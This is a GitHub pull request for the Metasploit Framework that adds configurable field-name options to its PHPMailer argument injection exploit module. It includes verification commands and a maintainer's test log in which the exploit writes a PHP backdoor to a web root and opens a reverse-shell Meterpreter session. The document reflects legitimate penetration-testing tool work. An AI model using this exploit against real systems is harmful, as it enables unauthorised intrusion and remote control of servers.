
Phpmailer arg injection update #16721

Merged (9 commits), Jun 29, 2022

Conversation

erikbomb (Contributor)

Added advanced options to change the name of the fields for the name, email, and message objects. Set the default to the previous hard-coded value.

No changes to the functionality of the code, just adding the ability for users to modify values. Edited the previous advanced option to comply with camel case.

Also went to the documentation and added the new advanced options.

This update was in the attic (did not have time to work on this for a while, sorry!). RE #15810
Thanks for the help!

Verification

  • Start msfconsole
  • use exploits/multi/http/phpmailer_arg_injection
  • set NAME_FIELD different_name

erikbomb and others added 2 commits June 28, 2022 23:08
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
smcintyre-r7 (Contributor)

Tested this successfully and everything is looking good. Changing the field datastore options will affect success, so I left them at their default values but confirmed they were changing the outcome. Once the unit tests pass, I'll get this landed.

[*] Processing /home/smcintyre/.msf4/msfconsole.rc for ERB directives.
resource (/home/smcintyre/.msf4/msfconsole.rc)> load request
[*] Successfully loaded plugin: Request
resource (/home/smcintyre/.msf4/msfconsole.rc)> load versions
[*] versions plugin loaded.
[*] Successfully loaded plugin: versions
resource (/home/smcintyre/.msf4/msfconsole.rc)> loadpath test/modules
Loaded 38 modules:
    14 auxiliary modules
    13 exploit modules
    11 post modules
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Writing the backdoor to /www/q19zYsn1.php
[*] Sleeping before requesting the payload from: /q19zYsn1.php
[*] Waiting for up to 300 seconds to trigger the payload
[+] Successfully found the payload
[*] Sending stage (39927 bytes) to 172.17.0.2
[+] Deleted /www/q19zYsn1.php
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 172.17.0.2:40494) at 2022-06-29 12:04:52 -0400
[+] Successfully triggered the payload

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.159.128 - Meterpreter session 1 closed.  Reason: Died

@smcintyre-r7 smcintyre-r7 merged commit 2d6e910 into rapid7:master Jun 29, 2022
smcintyre-r7 (Contributor)

Release Notes

This updates the PHP Mailer Argument Injection exploit to allow setting the names of certain fields via advanced options. These configuration options then allow the exploit to work in additional scenarios.

@smcintyre-r7 smcintyre-r7 added the rn-enhancement release notes enhancement label Jun 29, 2022